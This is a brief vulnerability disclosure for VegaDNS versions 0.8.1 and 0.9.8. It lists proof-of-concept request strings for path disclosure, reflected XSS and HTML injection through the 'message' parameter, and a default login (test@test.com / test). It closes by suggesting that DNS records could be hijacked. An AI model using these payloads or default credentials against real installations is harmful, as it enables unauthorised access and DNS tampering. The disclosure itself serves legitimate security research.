VegaDNS XSS
-----------
Desc: Multiple vulns in VegaDNS
Risk: Medium to High  
Discovered by : dyn0 (codeslag{hat}gmail.com) http://0xdeadface.co.uk
Project blurb : VegaDNS is a tinydns administration tool written in PHP 
					 to allow easy administration of DNS records through a web browser.

Affected Versions : tested on version 0.8.1, version 0.9.8

1) PATH DISCLOSURE : index.php?VDNS_Sessid='
2) XSS : index.php?VDNS_Sessid=[sessid]&message=[some error msg]<iframe src="http://microsoft.com">
3) HTML INJECTION :  index.php?VDNS_Sessid=[sessid]&message=[some error msg]<img src="http://goat.cx/hello.jpg">
4) GENERIC JS ALERT : index.php?VDNS_Sessid=[sessid]&message=[some error msg]<script>alert("0xdeadface");</script>
5) DEFAULT LOGIN : If the admins lazy (dumb?) then you might be able to login using user:test@test.com / pass:test

I'm lazy so this I've only tested the login page but I bet it wouldnt be too hard to hijack the dns

Hugs & Kisses dyn0